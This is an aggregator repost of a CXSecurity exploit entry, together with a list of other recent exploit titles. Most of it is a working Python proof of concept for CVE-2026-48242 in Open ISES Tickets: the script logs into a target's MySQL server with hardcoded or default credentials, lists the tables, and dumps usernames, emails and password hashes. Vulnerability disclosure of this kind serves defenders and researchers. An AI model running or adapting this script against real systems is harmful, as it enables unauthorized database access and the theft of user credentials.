惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Blog — PlanetScale
Blog — PlanetScale
Vercel News
Vercel News
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
量子位
Y
Y Combinator Blog
IT之家
IT之家
博客园 - 聂微东
L
LangChain Blog
爱范儿
爱范儿
H
Help Net Security
GbyAI
GbyAI
F
Fortinet All Blogs
B
Blog
Microsoft Security Blog
Microsoft Security Blog
罗磊的独立博客
C
Check Point Blog
博客园 - 三生石上(FineUI控件)
小众软件
小众软件
D
DataBreaches.Net
Last Week in AI
Last Week in AI
WordPress大学
WordPress大学
B
Blog RSS Feed
酷 壳 – CoolShell
酷 壳 – CoolShell
宝玉的分享
宝玉的分享

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution
Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials
Mohammed Idr · 2026-05-28 · via CXSECURITY Database RSS Feed - CXSecurity.com

Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials

#!/usr/bin/env python3 # Exploit Title: Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials # CVE: CVE-2026-48242 # Date: 2026-05-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/openises/tickets # Software Link: https://github.com/openises/tickets # Affected: Open ISES Tickets < 3.44.2 # Tested on: Linux # Category: WebApp # Platform: PHP/MySQL # Exploit Type: Credential Access # CVSS: 9.1 # CWE : CWE-798 # Description: Open ISES Tickets contains hardcoded MySQL credentials in import functionality allowing unauthenticated database access. # Fixed in: 3.44.2 # Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py 192.168.1.100 # # Options: # # Notes: # # How to Use # # Step 1: print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-48242 ║ ║ Target : Open ISES Tickets - Hardcoded MySQL Credentials ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import sys import mysql.connector from mysql.connector import Error import argparse parser = argparse.ArgumentParser(description="CVE-2026-48242 PoC") parser.add_argument("target", help="Target hostname or IP") parser.add_argument("--port", type=int, default=3306, help="MySQL port") parser.add_argument("--user", default="root", help="MySQL username") parser.add_argument("--password", default="", help="MySQL password") parser.add_argument("--database", default="tickets", help="Database name") parser.add_argument("--lhost", help="Your IP (unused in this exploit)") parser.add_argument("--lport", type=int, help="Your port (unused in this exploit)") args = parser.parse_args() print("[+] Open ISES Tickets CVE-2026-48242 PoC") print(f"[+] Target: {args.target}:{args.port}") print(f"[+] Credentials: {args.user} / {args.password or '(empty)'}") print("-" * 70) try: connection = mysql.connector.connect( host=args.target, port=args.port, user=args.user, password=args.password, database=args.database, connect_timeout=10 ) if connection.is_connected(): print("[+] SUCCESS! Connected using hardcoded credentials!") cursor = connection.cursor() cursor.execute("SHOW TABLES") tables = cursor.fetchall() print(f"\n[+] Found {len(tables)} tables:") for table in tables: print(f" - {table[0]}") try: cursor.execute("SELECT username, email, password FROM users LIMIT 5") users = cursor.fetchall() if users: print(f"\n[+] Sample users:") for user in users: print(f" {user[0]} | {user[1]} | {user[2][:50]}...") except: pass cursor.close() connection.close() print("\n[+] Database access successful.") except Error as e: print(f"[-] Connection failed: {e}") print("[!] Try default credentials: root / (empty), root / tickets, etc.") sys.exit(1) except Exception as e: print(f"[-] Error: {e}") sys.exit(1)

References:

https://github.com/openises/tickets/releases/tag/v3.44.2

CVEs referencing this url

https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com

Back to Top